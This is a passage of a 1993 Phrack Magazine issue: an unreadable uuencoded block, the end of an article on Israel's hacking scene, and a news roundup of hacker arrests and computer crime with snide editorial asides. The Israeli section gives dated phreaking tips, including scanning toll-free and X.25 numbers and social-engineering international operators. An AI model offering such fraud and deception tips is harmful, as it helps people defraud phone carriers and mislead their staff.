MWL'Y./S1,@PYC!4Y&8Y0ME'ICJ#3!:,HJKN0EH$A(9= H)\I*&I[H$QA"[N( MC&*R/=5RL(,XLZ9+-T4+K=[ C2>QNN,QOMA0(V-Y");J.JN1#1[),(<0B)M0 M(+&SIL91'[-3'_[@+>7Y/A'4"]?@B+GC"+\YCWV9(TWA/XXX&;%KKA1 -3Z! M"4%J&_YPF'H:H\SH0QH*P2(?/H/X-:0ZW0*QN+0Z[PE*A0 M&0KD-ADI"+: *+9JE/-PP@ILJV"CK%[_.8V*V,/7N$$\Z[,7:A8F 2K22CH> MT0UWHR+# @Y*'#1%C"GC0$)"(R.S:P+>0KS;8A]"4A_VJ0DNH;U:8J,TP:"- M$2@)(:ZM@@H/D3BP.AIN&I0O# K(B34[B1@Q% H R;+C8HF-^1=;,"$ZU:,9(.,3NDQH2/+06 MDSH9]!5GZ9X_@SL.^Y5Q(AO;V3I^C*F=PJ(#XS-[^R,0DS\96A^G2IO/2 V& M5(Y,\HCP6 E@ZPH+RA-BBXJ:4 B!N$*9\)"*::R&43$Q.CR?R*>4L"/-^0O[ MN;4[9)U\,9R"_T+ K@"SN\,0.).$.K@096L;;MR0,SF=6=N8E<"*OWB3UO,U MMN ,=9@$-=G&BFN(E=@0M*B*(2C1!WHA*@_@61U.6;GNV MQE&Q7@2X)EN;'A2@K^(,O/B]AIB-[Y@[OE$)RFFHO=D8_$FL2# 7CDR(F+") MLS**[HJ92>UV":YJNBYDLF MLCR>&>PV5>$]KN.S<&.:FJ+O00(+:,M;):K"1XH+_HG"@SBJFX,=?3KT09 M1VR\F6S3R91)S3G2&5WH"/N"0)B@$/T!+_IL38UI3;8HH %308K8QZKAFAF4 MMR31S:+:NJJKD=LT+;2T+4 B19_P#+AT M+2)J$/1ZHY5PJ$Q9#_2J"I70$K]S#Q0HS+99LI[PJ#]L@X]SH/2,@R9#/'%T M0I&S(#SYOSFZ&(.J"H?*%_=2)\$H0(1ZO5+1"A0@NJ Y+!00GHZXQ9.3%Y&K MMO-H$(SR)-M(OJ^,F7!BESRU1%]!--Y00>W_81[; (W@ )+GV%!$UTX8G*213+ M&3'YP!T($HH9Y) OX26Y)+BA:BT% MV]!NR; L@IX?(8!R:9M[*KO9DH_LVXE*;0/>$J!>":UM,3B] AEJC3&1R,FH M (NK\"IO(H*W28&,$XJ/4XJ0G":=^+B/JYR;6*SY*) "<XJOV@J1\_X$+7:@OU; 68L$*MX"RD9#,[S(<)S1'2X"9=*4-',P6 MJTL>>2R:T/H]YWDPY",TW"!4[UN6X_P2/_4S**D,;YK2*>6)%"LQ,KH)R)DP MN-S-SA +;/..2&$0 37'!<0*MA&@CJP)C_1%P\.NM@D4GD.@I BD]/A8RKQ, MH_A.$$(VE=P8_0$A54H92CHA4?F4H).7 RT> * *]ZK([]K._8PRJ#B,TAS. M0O.:JP43H:DI#:,>Y0RTX@,JF )%( $3;GFM= VTZW!8L[.T]DF#-&"J%),A M(22EG^ MLW,/Y/DIL"$ ;MG']1E =RK,6+A+FHC0CD&D!EVM -2P6KT!8KSC[U$N?0L)WJ&H+@ M.NU@OM/5L,>@B9JP--ZJ(51T3J!8K)H E*_"+RI*$O!S$+N,%V"KG[,X7P&A M'(:1VV^R"2=SDVGR">WC+PC"N-RJIXQAPI\A'$?(28:K(#OBF*U:H:"#L]=K M+UT(B98,.HRRN>(A'NMC"^5US9TML@*)I A-&IG1,#YUJ:F5CJ?[.D:L#>UP M*3\KX.*4%M3H&DZ+W7;9#8*IU^Q+&*"@5*[]":[_E4X!BIOP<>J+Y.?AL!HKTA4M3. M^-*%\IQ/ 17S[!,)ALD,@ MD&P?E,!;QXHK^I2DAYS?6YS?]STA]_I&NLB4J>@4F!6+F)'C8S.9 G*Q9L* MHMR543F* 3LZW_A0IZ6.S;K0"AX71/0B!:NPF +4@.VSW!-7A" "]P 4'M1G MH(8U;6Z?/AJZ9XG U:6W\(L0 %*O4HN4O'L)ZS,?>#+2HZE7G; NZ[IG+:P8 M_="XL\,N#$1 2:(<"KI2Y9)3*FZ5G%2NGI&5DOI&%*D$8<6JMM"$2AAFR;@+ MJ?^@0,AL%,>$3;?%&.#AQC+F-.%PB,.&9JS[LQGDCP[VMQ(0.,^@FN!0C@4D-OW0D^]0N;C"LA(6( *".!Q> M&P2"' J7<(4Y/& 4BL#EG%"SJI#S-36<86(CBV4M%>#9O!6*I-#$$%N("* U M2VHTIZFHTA!Q6\D,":4$@2=9W:)1L!2NP<9F[T7\T O^.B-?8Q56XQU1"/DN M*7JQHLF8 *^(BF/X&N=LQ2H4!U5V@SC*9K":D@"\PT@ =@I6C[MH433 M6)K7B, (Q.!N.Z8)3K6LW8^?2+%-[>;;S6;E(*SL0!9J,9;Z*4,A50DX$0E2 M3HL*:I7#3)MRF3@<)CQ*OEM;I1DD:U*SEDBH (DL0VN%P\F+T;)'4K926!F8N8L$+0^,-H_%>]/Y'4IY$;H?,N/C:99YZY8-4U'KH:)R[=#7 MBI[>\-9T.P@F]W'E2%,.A@E CLZ?)J7\]B8NR9L^5>"P,+EAM(K^62[*:XI) M&>Z%99M72HX"2G-9A1CKVT'O_Y)5(SL)5/+2\8 V-&S"BBQ3-BE*KEI66]"$ M%I%&O"XNJ(B$BCZF5YI&;#O;HX=A>?%.6L M\=D6BO\2PS(221QU7KK:P2S)[VWM?>4/LUM5F3AXK\E'8K)!16J5_AT*_E&+ MAB*U^6W;2#")^)B,F!!,5NNX9S>?E*AM'98_0F:4BW%-/ *0JXB\YU[;6Y1K M%F\OA:ZD;K>CMCFF#A4(%H>HS'\D2;](26<+!1+I/Z/06D*FJN\,F.]9,R;-D@9,]>Y) D01)DB1,DC1ARB0-DS9HDK!)DR2-U:U,210! M2_(CQY5"2]P\&]TY@:=.G2]ND M$6" 303HE597-146"40(UU)[(&!W'5$D3$0776W$T8@:99HUEYMA%E$&51AQQQ>%&B*;! MME8<*.[%$$4/C;@6=(%1:8LN!RF'FR0TII""4/I]61T!2YI824.R5&10194X MV29$#]DBBRT?96223?%Y-Y)1WJ$W_U)0);7DTW \%=4>4F)Z!R9YWGFDT5@J MA71?22JJ:-E33&&:!!I1I8&$5DPQB(12)"3QT7 I@23I2>U!9V%Q:6+-0OAQB9M!R$721T5 MME60B25EY-%Z=]J9%@DCH4K2H(F:I1UX[.J'UF'AM2OQ>!)WE^J$(*G(G\>8 M>HI$&YY^NE01F); H)??V4F"1MB1AS&MI(%XE[86:B@1FGPY9!RN)YZ+0L8I MC)H$"L9.YO\C@3<"65G2F_T(%1(TMA&%:*793-I=;8@&VES?4I3UDC<;9%NX M%2ED25/JMKONGF]_9%-3NNAB22QLLJ:;)&;R[=Q$"S%DXDIU6ES41F#J]U), M&G$TH78N>]?N1HQ'O+!1P7''XDDM9H[6??QERM15F':Z%!(GFYS8J$0,:O!. MX*$57)-[N=H&AWVY)^M.UX97,W3<;>>7VU1&16W7_N$1>7$5(V"'.2&$10ASO B9YDXK+A M/"YSPB.!J$#G022 ;"D% I7)D)"RE?SD)Y # $? ,[@2\ 4UNM-+^%ZS)!%1 M:2!YRULEA@0L=9F$:$23'XX]O$> M<$,From time to time, however, there are arrests (see PWN on Phrack 35, 38 elsewhere). These usually involve (in the case of the guy described on Phrack 35) a tip from police overseas, who kept bugging the Israeli police until they made a move, or idiots who sell things. The guy in the Phrack 35 World News, Deri Schreibman, was arrested after he supplied credit cards to people in the U.S. and Canada, who turned him in when they got caught. He himself turned in a lot of people, but his information "just" led to them being visited. Nothing much has been heard about that since, but his case got a lot of publicity because he had a lot of computer equipment, including this/that-boxes, and was said to have broken in Washington Post and the Pentagon. After him, there have been raids on hackers but nothing serious happened to them, and the news coverage was not incredible. A year or so ago one total asshole went on a national show (nothing like Geraldo) and told everyone how he too, abused Isranet and the Washington Post; he also claimed that Bezeq didn't have a clue and that was why he wasn't afraid. He was visited and his equipment was taken. At much earlier times there was a teenager who changed an article on the last page on an Israeli newspaper to say that his math teacher had been arrested for drug dealing; he got to write a computer program to aid blind and deaf people. That is the general way busts go on in Israel, because there is no such great danger as to even warrant dreams of something like Sundevil. There are also sometimes problems in the army, but they are dealt with internally, by the army (I don't think anyone gets shot though). When a bust occurred, usually many people quit fooling around with Isranet for a while, because all those who did get caught were doing the same things with Isranet. But except for that, there were no great waves in the pond after busts, except again for the Deri S. case. This is due simply to the fact that hackers, in Israel and usually anywhere else, simply don't amount to the amount of problems "professional" criminals make to the police, (the same way Israeli software houses chase down pirating firms and not boards), and since Israel doesn't have an FBI and/or USSS the law isn't going around pointing guns at hackers. HACKING IN ISRAEL ***************** Hacking or phreaking in Israel in not very sophisticated. The average Israeli can scan all he likes; Israeli toll free numbers in the format of 177+Country Code+XXXX exist to almost every country. This means that by dialing 177 (= 1-800), a country code (440 for the UK, 100 for AT&T, 150 for MCI, etc), and a number on the XXXX format, you have a chance of connecting to a number in country whose country code you're using. Voice mail systems, modems and other things can be found there (h00ray!). There are also calling cards and X.25 and 056 (= 1-900) scams, etc, etc. A nice way to start scanning (if anyone is interested) the 4251 DNIC is based on area codes (yes, just like Telenet). For example, a lot of systems in the 04 area code will be somewhere at: 4251 400 ... This might lead to disappointing results, though, since most systems use Hebrew (most interesting systems). The best way to get Israeli area codes is by using a file on international country/area codes put out a while ago... Funny, but it's more accurate than a C&P phone book. If you're into social engineering foreigners, give 1 800 477-5664 (AT&T) or 1 800 477-2354 (MCI) a call. These will get you to an Israeli operator who will be happy to place a call for you, if you're into experimenting (another one of Bezeq's new services, called Israel*Direct... also available from the UK, Ireland, Germany and more.) CONCLUSION ********** I hope you have learned about the Israeli scene. My purpose was NOT to dis anything, it was to show that even though we live in this global village of networks and electronic data exchange (ohh), living in outer butt-fuck (I did not invent this term) has its advantages, in the form of basic stupidity, and its disadvantages in the form of lack of technology and organization in the community. Yeah. There are still many nice things about hacking in Israel. Enjoy your life. ==Phrack Magazine== Volume Four, Issue Forty-Four, File 27 of 27 PWN PWN PNW PNW PNW PNW PNW PNW PNW PNW PNW PWN PWN PWN PWN PWN Phrack World News PWN PWN PWN PWN Compiled by Datastream Cowboy PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN Feds Pull The Plug On Phiber Optik November 4, 1993 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by Joshua Quitner (Newsday) (Page 57) The biggest case of computer intrusion in US history drew to a close yesterday when a young Elmhurst, Queens, man was sentenced to a year and a day in jail for his part in an electronic gang that, for years, roamed the nation's largest telephone and data networks. Mark Abene, 21, renowned in the digital underground as Phiber Optik, was the last of five young New York City men to plead guilty in federal court to one felony count of conspiracy for being in a hacker group known as MOD. Abene apologized for his deeds yesterday. "I'm just sorry they were misconstrued as malicious in any way," he said in Manhattan's federal district court. Prosecutors claimed that the young men rumbled on computer networks, disconnecting other hackers' phone service and posting embarrassing information culled from confidential credit networks like TRW on underground bulletin boards. They also used their power skills to get telephone numbers or credit reports for celebrities, including Julia Roberts, John Gotti, Geraldo Rivera, Christina Applegate and Mad Magazine founder William Gaines. John Lee, 22, a co-defendant is now serving a one year sentence in a "shock incarceration" boot camp in Lewisburg, PA. Lee and Julio Fernandez, 18, were the only gang members who made money from the two years of break-ins. In addition to Lee and Fernandez, Paul Stira, 23, of Cambria Heights, Queens, and Elias Ladopoulos, 24, of Jamaica, Queens, are serving six-month sentences in federal prisons in Pennsylvania. Fernandez has been cooperating with authorities and is not expected to be jailed. ------------------------------------------------------------------------------- Computer Caper Is Unpluged ~~~~~~~~~~~~~~~~~~~~~~~~~~ October 1, 1993 by Tim Bryant (St. Louis Dispatch) (Page A1) Investigators said 18-year-old computer hacker Paul J. Gray of Creve Coeur, MO, was arrested on a state charge of tampering with computer data, a misdemeanor. The college freshman reportedly used his home computer to spy electronically on files of a federal appeals court and charge long-distance telephone calls to Mercantile Bank ------------------------------------------------------------------------------- Teen Hacker Admits Having Illegal Credit Information June 17, 1993 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by James McClear (Detroit News) (Page B7) Ander Monson, 18, of Houghton, MI, whose electronic misadventures uploaded him into the high-tech world of computer fraud, pleaded guilty in Oakland County Probate Court to illegal possession of credit card information. ------------------------------------------------------------------------------- In The Jungle Of MUD September 13, 1993 ~~~~~~~~~~~~~~~~~~~~ by Ellen Germain (Time) (Page 61) Virtual worlds you can hook into--and get hooked on--are the latest rage on the computer networks. [Ah, yes, Virtual Reality as perceived through the minds of the computer illiterate. But wait, it's electronic crack! Keep an eye out for your children!] ------------------------------------------------------------------------------- NCIC Abuse - Is Legislation The Answer October, 1993 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by Brian Miller Confidential information is being illegally released from the National Crime Information Center network. But abuse of the system is difficult to detect, and those caught are seldom punished. A former law enforcement officer tracked town his ex-girlfriend with information from an FBI-run law enforcement information system. Then he killed her. A terminal operator in Pennsylvania used the same system to conduct background searches for her drug dealing boyfriend to see if his customers were undercover agents. It is hard to trace abuse to a single user because many agencies don't require personal access codes which would keep track of who made specific inquiries on the system and when they occurred. The General Accounting Office polled all the states and found that 17 don't require a personal code to access the NCIC. Most of these had an identifier only for the terminal or agency accessing the system. And if someone is caught abusing the system, they are seldom charged with a crime. The GAO found that the most common penalty was a reprimand, with some suspensions and firings. Of the 56 cases of abuse found by the GAO, only seven people were prosecuted. The FBI cannot force the states to adopt certain security measures because compliance with the guidelines is voluntary. The reason for this is that the guts of the NCIC come from the states, and the FBI simply maintains the network. "The main thing that can be done today is to enforce the law, and create stronger penalties for abusing the system," said Marc Rotenbertg of Computer Professionals for Social Responsibility, an advocacy group based in Palo Alto, California. ------------------------------------------------------------------------------- Live Wires September 6, 1993 ~~~~~~~~~~ by Barbara Kantrowitz et.al. (Time) (Page 63) & Technoid Circus ~~~~~~~~~~~~~~~ by Rex Weiner (Spin) (Page 72) September, 1993 [K-K00l cYbUR P|_|n|< aRt1Cl3zzzz Jump On The Cyber Bandwagon! More Journalists ride that old info highway straight to HELL!] ** BUT WAIT! A "Cyber" article we can all dig! ** Speciale Cyber Settembre, 1993 ~~~~~~~~~~~~~~ di Sergio Stingo (King) (P. 131) Il cyberpunk: tutti ne parlano, ma pochi sanno cosa sia veramente. Libri elettronici? Scenari inquietanti del futuro prossimo venturo? Conferenze telematiche? Nuovi tipi di abbigliamento usa-e-getta? La piu' grande rivoluzione democratica dei nostri anni? Una rivoluzione strisciante e silenziosa? Ia nostro stingo, sempre curioso del <>, S'e' messo a girare l'italia per iundagare il fenomeno. E' stato come scoperchiare una pentola in ebollizione. Piu' incontrava <> e piu' scopriva che c'era da scoprire. Dal teorico della <>, che sperimenta l'oggetto misterioso tra discoteche e universita', alla prima galleria dove sono esposte opere di hacker art. Dalle riviste-bandiera del cyber, come <>, alle band che stanno inventando una nuova musica. Per non parlare del sesso, che grazie alla tecnologia cerca di ampliare la gamma delle sensazioni possibili. Insomma, il viaggio oltre i confini di questo mondo e' stato talmente ricco e avventuroso, che abbiamo dovuto suddividere il reportage in due puntate. In questo numero presentiamo la prima. E, come si dice tra cybernauti, buona navigazione. [I don't know what that says, but its in another language, so it has to be cooler than the American CyberCrap] ------------------------------------------------------------------------------- Security Products Abound, But Is Toll Fraud Too Tough? August 30, 1993 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by Dan O'Shea (Telephony) (Page 7) Telecommunications toll fraud is an increasingly popular crime that collectively costs its victims billions of dollars each year. Although carriers have responded with a wave of security products and services, the problem might be much bigger than was once thought. Some carriers claim that industry wide toll fraud losses amount to between $2 billion and $5 billion a year, but the true figure is closer to $8 billion, according to Bernie Milligan, president of CTF Specialists Inc., a consulting group that studies toll fraud and markets security services to large corporate telecommunications users. [ed: remember HoHo Con? Yes...THAT Bernie] Toll fraud involving calls coming into AT&T's 800 network dropped 75% since the introduction of NetProtect, while Sprint estimates a 95% decrease from last year (since the introduction of their fraud detection service). Average losses across the industry have plummeted from $120,000 per incident to $45,000. Despite the offensive against telecom fraud, the problem persists and is becoming more frequent, and new technologies will only represent potential new adventures for hackers, CFT's Milligan said. Hacker activity is growing at an annual rate of 35%. Some 65% to 80% of toll fraud involves international calling, and fraud occurs on a much wider scale than just inbound 800 calls, Milligan said. So, while losses of this type of fraud drop, collective fraud losses are increasing by 25% each year. Customers are still liable financially in toll fraud cases, and the carriers continue to get paid. ------------------------------------------------------------------------------- Misfit Millionaires December, 1993 ~~~~~~~~~~~~~~~~~~~ by Steve Fishman (Details) (Page 158) [Author profiles several of the early Microsoft programmers, namely Richard Brodie, Jabe Blumenthal, Kevin DeGraaf, Neil Konzen and Doug Klunder] ------------------------------------------------------------------------------- Intercourse With Lisa Palac 1993 ~~~~~~~~~~~~~~~~~~~~~~~~~~~ by Melissa Plotsky (Axcess) (Page 62) & Turned On By Technology In The World Of Cybersex August 30, 1993 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by Marco R. della Cava (USA Today) (Page 4D) [An interview and an overview dealing with online nastiness. Lisa Palac editor of Future Sex and producer of Cyborgasm talks about all kinds of stuff. As a regular peruser of Future Sex (for the articles of course) I can't help but wonder why we haven't seen HER naked yet. Email her at futursex@well.sf.ca.us and demand some gifs.] ------------------------------------------------------------------------------- Don't Try This At Home ~~~~~~~~~~~~~~~~~~~~~~ August, 1993 (Compute) (Page 62) Welcome to desktop forgery. Susan Morton, senior forensic document examiner with the US Postal Service in San Francisco, has seen gangs travelling the country packing computers, scanners, and laser printers. Arriving in town, their first move is to rob a mailbox to acquire some checks that were mailed to, say, a local utility company. They will copy the account and routing code off some citizen's check and decide what branch bank that person probably uses. Then they forge a large corporate or government check to that person, using information from other checks they found in the mail. Packing a forged ID, a gang member will then go to a branch across town where presumably nobody knows the citizen and deposit part of that forged check. The check may be for $5000, of which the forger takes $2000 as cash, smiles and leaves. One check forging gang was chased across Texas for about six months in the late 1980s, recalls Robert Ansley, corporate security manager for Dell Computer in Austin, Texas, then with the Austin police department. Armed with a stolen Macintosh and an ID maker stolen from a highway patrol substation, they passed more than $100,000 in bogus checks in Austin alone. Sources say other gangs have used laser printers to forge security ID badges to get into office buildings and steal the computers, nodding at the friendly security guard at the front desk while trudging out with their arms full. "We have been urging corporations to move forward with EDI (Electronic Data Interchange) for more and more of their business transactions and avoid paper, since it will become so vulnerable," says Donn Parker, computer crime expert with SRI International in Menlo Park, California. In 1991, the Secret Service busted 66 traditional counterfeiting operations, while seizing 52 office machines that had been used for counterfeiting ------------------------------------------------------------------------------- Subduing Software Pirates October, 1993 ~~~~~~~~~~~~~~~~~~~~~~~~~ by Suzanne Weisband and Seymour Goodman (Technology Review) (Page 30) [The software manufacturers claim they lose between 9 and 12 billion annually. Thank GOD for the SPA and the BSA. Like they are go to Singapore or Hong Kong with guns and get the REAL culprits. Noooo. Let's raid BBSes and businesses. Their people at COMDEX told me they really weren't interested in taking my money to help me combat Phrack Piracy. I think we all know where THEIR interests lie.] ------------------------------------------------------------------------------- Mindvox: Urban Attitude Online November, 1993 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by Charles Platt (Wired) (Page 56) [Another of those cute Mindvox RULES articles. "Fancher looked too neat, clean, and classy to be a hacker, but he enjoyed the cut-and-thrust of online jousting as much as anyone." But wait, there's a little name dropping too: Wil Wheaton, Kurt Larson, Billy Idol, THE LEGION OF DOOM! Don't get me wrong, I love Vox. And I really like the author of this story's last book "The Silicon Man," I just get kinda edgy about stuff in Wired. Favorite quote: "Unix is arcane," says Bruce, "and it's weird, and most users don't want to deal with it." I know I don't. Not.] ------------------------------------------------------------------------------- Intel To Protect Chips October 22, 1993 ~~~~~~~~~~~~~~~~~~~~~~ (Newswire Sources) One of the nation's largest manufacturers of computer chips said Friday it will start to put serial numbers on its products in an effort to stem the rising tide of robberies. Intel Corp. said it was taking its actions after a flurry of armed takeover robberies at warehouses in California's Silicon Valley over the last six months. What the robbers are after is microprocessors -- the brains that power personal computers. Among their favorite targets has been Intel's 486 microprocessor. Julius Finkelstein, head of Santa Clara's High Tech Crime Task Force, called chip robberies "the gang crime of the 1990s." "They are just as valuable as cocaine," he said. "But they are easier to get rid of and if you are caught the penalties aren't as severe." The gangs, Finkelstein said, are Asian, well organized and very knowledgable about computer components. They generally drive up to a warehouse door as if coming for a shipment, but once inside pull out their weapons and force the employees to the floor. Last month, a takeover robbery at the Wylie Laboratories Electronic Marketing Group in Santa Clara netted thieves an estimated $1 million in chips. Finkelstein said that robbery took only about 15 minutes. ------------------------------------------------------------------------------- Chip Robberies Continue November 5, 1993 ~~~~~~~~~~~~~~~~~~~~~~~ (Newswire Sources) Authorities said a gang of Vietnamese-speaking bandits staged a violent takeover robbery of a San Jose computer parts company Thursday, wounding one man and escaping with an undisclosed amount of electronic equipment. Lt. Rob Davis said the robbery began at 1:01 a.m. when as many as five gunmen forced their way into the Top Line Electronics Co., a computer board manufacturer. The bandits rounded up the employees and beat them in an attempt to find where the computer parts were stored. One employee was shot in the hip as he tried to escape. Davis said the man was treated at a local hospital and was listed in stable condition. ------------------------------------------------------------------------------- Hacker Revelled In Spotlight, Court Told August 23, 1993 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ (The Age) A hacker who broke into a computer at NASA in the United States, and contemplated sending it a message not to launch a space shuttle, was delighted with the effect he was having, the County Court was told yesterday. The prosecutor, Mr Richard Maidment, said that in a three-way conversation between Nahshon Even-Chaim, David John Woodcock and another computer hacker, Woodcock discussed sending a message to a computer at NASA to stop the launch of a space shuttle, after Woodcock talked about the shuttle Challenger, which blew up several years before, and said "I have got to do something about NASA." Even-Chaim, 22, formerly of Narong Road, Caulfield, yesterday pleaded guilty to 15 charges relating to unauthorized obtaining, altering, inserting, and erasing of data stored in a computer, and the interfering and obstruction of the lawful use of a computer. Woodcock, 25, formerly of Ashleigh Avenue, Frankston, pleaded guilty to two counts of being knowingly concerned in the obtaining of unauthorized access by Even-Chaim to data stored in a computer. The court was told that a co-offender, Richard Martin Jones was earlier sentenced to six months jail, but was released on a $500, six-month good behavior bond. The court was told that Even-Chaim obtained free use of telephone lines for many hours to connect his home computer to other systems in the United States. Mr. Maidment said that Even-Chaim, Woodcock, and Jones, who collectively called themselves "The Realm", were arrested in April 1990 by the Australia Federal Police after an investigation that began with information received from the United States Secret Service. ------------------------------------------------------------------------------- The Last Hacker September 26, 1993 ~~~~~~~~~~~~~~~ by Jonathan Littman (LA Times) [This is the bet article I've seen yet about Kevin Poulsen. Please go find it and read it. It covers Poulsen from beginning to end. All the crazy stunts, the life on the run, the show down with the feds. Everything. Here is a small excerpt.] KIIS-Fm called it a "Win a Porsche by Friday": eight Porsches - about $400,000 worth of steel, leather and status - given away, one a week. You could hardly live or work in Los Angeles without being caught up in the frenzy. It seems that the gleaming, candy-red convertibles were plastered on nearly every billboard and bus in town. Listeners were glued to KIIS, hoping to make the 102nd call after Dees spun the third song in the magical series. Housewives, businessmen, students and contest freaks jammed the lines with their car phones and auto-dialers. They all had hopes, but one 24-year-old high school dropout had a plan. America's most wanted hacker and his associates sat by their computers and waited. On the morning of June 1, 1990 KIIS played 'Escapade,' 'Love Shack; and then, yes, "Kiss." "We blew out the phone lines," every line was ringing says Karen Tobin, the stations promotional director. "We picked up the calls and counted." The hacker was counting too. At the precise moment Price's "Kiss" hit the air he seized control of the station's 25 phone liens, blocking out all calls but his own. Then the man, who identified himself as Michael B. Peters, calmly dialed the 102nd call and won a Porsche 944 S2. It was child's play. Especially for Kevin Lee Poulsen. Computer hacking had once seemed an innocent obsession to Poulsen, a native of Pasadena, but now it was his life, and it had taken him over the line. This October, Poulsen will face the first of two trials, one in San Jose and another in Los Angeles, that federal prosecutors say are critical to the government. Because of the seriousness of his alleged breaches of national security, they intend to use the case as an example to the hacker underground. As a teen-ager, Poulsen had burrowed deep into the giant switching networks of Pacific Bell, exploring and exploiting nearly every element of its powerful computers, from the common systems responsible for creating, changing and maintaining phone service to the shadow systems that guard the secrets of national security, according to accusations in a federal indictment. The U.S. attorney in San Jose says that Poulsen had wiretapped the intimate phone calls of a Hollywood starlet, allegedly conspired to steal classified military orders, and reportedly uncovered unpublished telephone numbers for the Soviet Consulate in San Francisco. -------------------------------------------------------------------------------